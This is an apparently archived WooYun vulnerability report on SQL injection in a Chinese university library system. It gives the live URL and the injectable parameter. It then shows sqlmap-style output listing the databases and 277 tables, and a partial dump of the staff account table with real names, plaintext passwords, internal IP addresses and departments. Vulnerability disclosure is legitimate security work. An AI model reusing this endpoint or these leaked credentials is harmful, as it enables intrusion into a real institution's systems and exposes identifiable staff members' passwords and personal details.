当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105427

漏洞标题:对外经济贸易大学 图书馆系统 sql注入 可拖库

相关厂商:对外经济贸易大学

漏洞作者: wclqust

提交时间:2015-04-03 15:05

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-03: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

对外经济贸易大学 图书馆系统 sql注入 可拖库

详细说明:

漏洞链接及参数
http://lib.uibe.edu.cn/tsg/AdvicesBaseView.aspx
?ID=1 注入点为ID

漏洞证明:

数据库信息
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDLISNET
[*] MDSYS
[*] OLAPSYS
[*] OPAC
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
当前数据库表
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
Database: GDLISNET
[277 tables]
+----------------------------+
| DISK_上传日志 |
| DISK_上传服务器 |
| DISK_删除日志 |
| DISK_制作信息 |
| DISK_复本文件信息表 |
| DISK_情报检索上传日志 |
| DISK_情报检索删除日志 |
| DISK_情报检索文件信息表 |
| DISK_文件信息表 |
| DISK_文件命名规则 |
| DISK_浏览日志 |
| DISK_用户服务对应表 |
| DISK_申请开通 |
| DISK_远程插盘日志 |
| DISK_附件下载日志 |
| ISBN出版者库 |
| MARC处理日志 |
| MARC数据字典 |
| MARC过滤字段 |
| OPAC_SMTP服务器设置 |
| OPAC_其他订阅 |
| OPAC_分类检索 |
| OPAC_图书推荐表 |
| OPAC_征订列表 |
| OPAC_征订目录 |
| OPAC_文献评分 |
| OPAC_文献评论 |
| OPAC_热门收藏 |
| OPAC_热门检索 |
| OPAC_热门浏览 |
| OPAC_留言回复 |
| OPAC_站内消息 |
| OPAC_网页注册 |
| OPAC_读者推荐库 |
| OPAC_读者留言 |
| OPAC_读者订阅 |
| OPAC_资源连接 |
| OPAC_邮件发生日志 |
| OPAC_邮件模板 |
| OPERN_封面 |
| OPERN_文件列表 |
| OPERN_曲谱信息 |
| OPERN_服务器列表 |
| XZ_人事管理数据库 |
| XZ_公文发送数据库 |
| XZ_公文库 |
| XZ_公文收登数据库 |
| XZ_物品管理数据库 |
| XZ_设备库 |
| XZ_设备管理数据库 |
| XZ_通讯录 |
| XZ界面定义 |
| 上架日志 |
| 下架日志 |
| 丛编库 |
| 书目数据库定义 |
| 代书板外借库 |
| 代书板外借日志库 |
| 代书板库 |
| 停用读者网络 |
| 典藏记录修改日志 |
| 分类主题词表 |
| 分类馆藏统计 |
| 删除记录日志库 |
| 剔除统计表 |
| 单打标签库 |
| 单打标签库221 |
| 单打标签库222 |
| 单打标签库223 |
| 单打标签库224 |
| 单打标签库230 |
| 单打标签库260 |
| 单打标签库270 |
| 单打标签库311 |
| 单打标签库322 |
| 单打标签库341 |
| 单打标签库342 |
| 单打标签库343 |
| 单打标签库348 |
| 单打标签库349 |
| 单打标签库360 |
| 单打标签库365 |
| 单打标签库366 |
| 单打标签库367 |
| 单打标签库368 |
| 单打标签库369 |
| 单打标签库371 |
| 单打标签库372 |
| 单打标签库374 |
| 单打标签库377 |
| 单打标签库38 |
| 发行商库 |
| 四角号码表 |
| 图书发行列表 |
| 图书订购比对表 |
| 图书赔偿分类统计 |
| 处罚信息 |
| 处罚类型 |
| 委托借阅表 |
| 委托提出日志 |
| 审核日志 |
| 年度增长表 |
| 征订目录 |
| 待采书库 |
| 待采书库NEW |
| 快速验收日志 |
| 总括登记表 |
| 情报检索MARC数据字典 |
| 情报检索一对多库 |
| 情报检索库 |
| 扫描分配日志 |
| 批量调配日志 |
| 报表模板定义 |
| 报表模板定义NEW |
| 拒采理由 |
| 拼音库 |
| 操作员流通规则权限 |
| 数据导入定义库 |
| 数据选择库 |
| 文献传递日志 |
| 文献传递表 |
| 文献类型 |
| 文献资源分类统计 |
| 新书征订单 |
| 新书征订库 |
| 新书征订推荐库 |
| 新书征订消息 |
| 新书征订目录 |
| 新书征订规则 |
| 新书自动分配 |
| 期刊催缺临时表 |
| 期刊分配部门定义 |
| 期刊发行列表 |
| 期刊扫描日志 |
| 期刊签到分配库 |
| 期刊签到分配接收日志 |
| 期刊签到库 |
| 期刊签到日志 |
| 期刊篇目库 |
| 期刊装订库 |
| 期刊订购比对表 |
| 期刊订购目录 |
| 期刊采购分配库 |
| 期刊采购库 |
| 期刊预订订单号 |
| 机器 |
| 条形码 |
| 查看馆藏地日志 |
| 标准书目源库 |
| 标准书目源库NEW |
| 标签打印临时表 |
| 检索一对多库 |
| 检索主题词库 |
| 检索编码库 |
| 检索责任者库 |
| 检索途径定义 |
| 检索途径生成方式 |
| 汉语拼音著者号码表 |
| 流通分类统计 |
| 流通单位统计 |
| 流通参数定义 |
| 流通工作日 |
| 流通工作站定义 |
| 流通工作量统计 |
| 流通库 |
| 流通日志 |
| 流通条码修改日志 |
| 消息列表 |
| 消息模板 |
| 特借流通参数定义 |
| 特借流通库 |
| 特借流通日志 |
| 特殊借阅规则 |
| 特种统计表 |
| 现刊条形码库 |
| 用户登录日志 |
| 登录号工作分配表 |
| 盘点日志 |
| 种次号库 |
| 系统单位定义 |
| 系统参数定义 |
| 系统定义 |
| 系统用户信息 |
| 索书号重号管理 |
| 网页注册 |
| 网页访问量 |
| 罚款信息 |
| 自定义分类统计 |
| 自定义分类统计NEW |
| 自定义导出报表 |
| 自定义著者号码表 |
| 虚拟库室 |
| 表格模板 |
| 读者丢书赔款日志 |
| 读者单位 |
| 读者库 |
| 读者推荐库 |
| 读者操作日志 |
| 读者特殊控制 |
| 读者班级 |
| 读者统计 |
| 读者账号信息 |
| 读者院系 |
| 赔书规则表 |
| 进货单时间段统计 |
| 违章处罚对应关系 |
| 违章处罚表 |
| 违章类型 |
| 选书征订单 |
| 通知留言库 |
| 采购库 |
| 采购批次号 |
| 采购经费库 |
| 阅览室定义 |
| 阅览日志 |
| 附件信息表 |
| 预分配规则 |
| 预约库 |
| 馆藏书目库 |
| 馆藏典藏库 |
| 馆藏分类统计表 |
| 馆藏地址定义 |
| 馆藏明细 |
| ACQWORK |
| AQUMARC_DATA |
| AUTHCODE |
| AUTH_NAM |
| AUTH_PY |
| BARWORK |
| CARTABLE |
| CIRFIN |
| COPER_N |
| EXPORT000204 |
| EXPORT000223 |
| FUFEN |
| HOLDING |
| ILASBM |
| ILAS_SYSTEM |
| MARC_DATA |
| MULTI_PY |
| OPAC_NEWS |
| PHOTO |
| QUEST_COM_PRODUCTS |
| QUEST_COM_PRODUCTS_USED_BY |
| QUEST_COM_PRODUCT_PRIVS |
| QUEST_COM_USERS |
| QUEST_COM_USER_PRIVILEGES |
| SOLRUPDATE |
| SQLTRACKCIRCULATE |
| SQLTRACKCIRCULATELOG |
| SQLTRACKERBOOKMAIN |
| SQLTRACKERLOCAL |
| SQLTRACKREADER |
| SQLTRACKREADINGROOM |
| SQLTRACKREG |
| STANDARD_MARCDATA |
| S_ACQWORK |
| S_BINDING |
| S_REGIST |
| TEMP18401 |
| TEMP21166 |
| TEMP26015 |
| TEMP26153 |
| TEMP26986 |
| TEMP29100 |
| TEMP46489 |
| TEMP51655 |
| TEMP53782 |
| TEMP54299 |
| TEMP56927 |
| TEMP718 |
| TEST1 |
| TEST2 |
| TEST4 |
| TEST6 |
| TMPCIR |
| XZ_ |
+----------------------------+
敏感表信息
Database: GDLISNET
Table: 系统用户信息
[56 entries]
+------+------+------+------+------------+-------+------+-------+---------------------+--------+----------+--------+--------+--------+--------+--------+--------+--------+--------+--------+---------+---------+-----------------+---------+---------+----------+
| "职称" | "手机" | "账号" | "性别" | "密码" | "姓名" | "职位" | "馆键码" | "登录时间" | "电子邮箱" | "登录站名" | "家庭电话" | "邮政编码" | "工作部门" | "签到时间" | "用户代码" | "家庭住址" | "权限级别" | "显示面板" | "管理权限" | "阅览室控制" | "旧系统标识" | "登录站IP" | "办公室电话" | "身份证号码" | "可用分配库室" |
+------+------+------+------+------------+-------+------+-------+---------------------+--------+----------+--------+--------+--------+--------+--------+--------+--------+--------+--------+---------+---------+-----------------+---------+---------+----------+
| NULL | NULL | NULL | 女 | 20040311 | | NULL | 1 | NULL | NULL | NULL | NULL | NULL | 自动化部 | NULL | 80 | NULL | 2 | NULL | | NULL | dy1 | NULL | NULL | NULL | NULL |
| NULL | NULL | 6 | 女 | 123456 | | NULL | 1 | 2014-06-04 09:51:15 | NULL | NULL | NULL | NULL | 采编部 | NULL | 6 | NULL | 2 | NULL | | NULL | djh1 | NULL | NULL | NULL | NULL |
| NULL | NULL | NULL | 男 | wangmx | 徐高林 | NULL | 1 | NULL | NULL | NULL | NULL | NULL | 已离职或退休 | NULL | 2 | NULL | 2 | NULL | | NULL | xgl | NULL | NULL | NULL | NULL |
| NULL | NULL | 38 | 男 | qkcb | 陈长仲 | NULL | 1 | 2015-04-02 09:37:40 | NULL | ccz | NULL | NULL | 采编部 | NULL | 38 | NULL | 0 | NULL | | NULL | ccz | 192.168.165.73 | NULL | NULL | NULL |
| NULL | NULL | NULL | 女 | 9922110055 | 蔡淑清 | NULL | 1 | NULL | NULL | NULL | NULL | NULL | 采编部 | NULL | 52 | NULL | 2 | NULL | | NULL | caisq | NULL | NULL | NULL | NULL |
| NULL | NULL | NULL | 女 | NULL | 尤淑华 | NULL | 1 | NULL | NULL | NULL | NULL | NULL | 采编部 | NULL | 112 | NULL | NULL | NULL | | NULL | NULL | NULL | NULL | NULL | NULL |
| NULL | NULL | NULL | 女 | NULL | | NULL | 1 | NULL | NULL | NULL | NULL | NULL | 采编部 | NULL | 64 | NULL | 0 | NULL | | NULL | caisq1 | NULL | NULL | NULL | NULL |
| NULL | NULL | 41 | 女 | zhouhong | 周红 | NULL | 1 | 2015-04-02 11:04:10 | NULL | zhouhong | NULL | NULL | 采编部 | NULL | 41 | NULL | 2 | NULL | | NULL | zh | 192.168.165.72 | NULL | NULL | NULL |
| 研究馆员 | NULL | 1 | 男 | jintao2008 | 系统管理员 | 部主任 | 1 | NULL | NULL | NULL | NULL | NULL | 自动化部 | NULL | 1 | NULL | 1 | NULL | | NULL | NULL | NULL | 12333 | NULL | NULL |
|

修复方案:

防注入

版权声明:转载请注明来源 wclqust@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-13 16:58

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无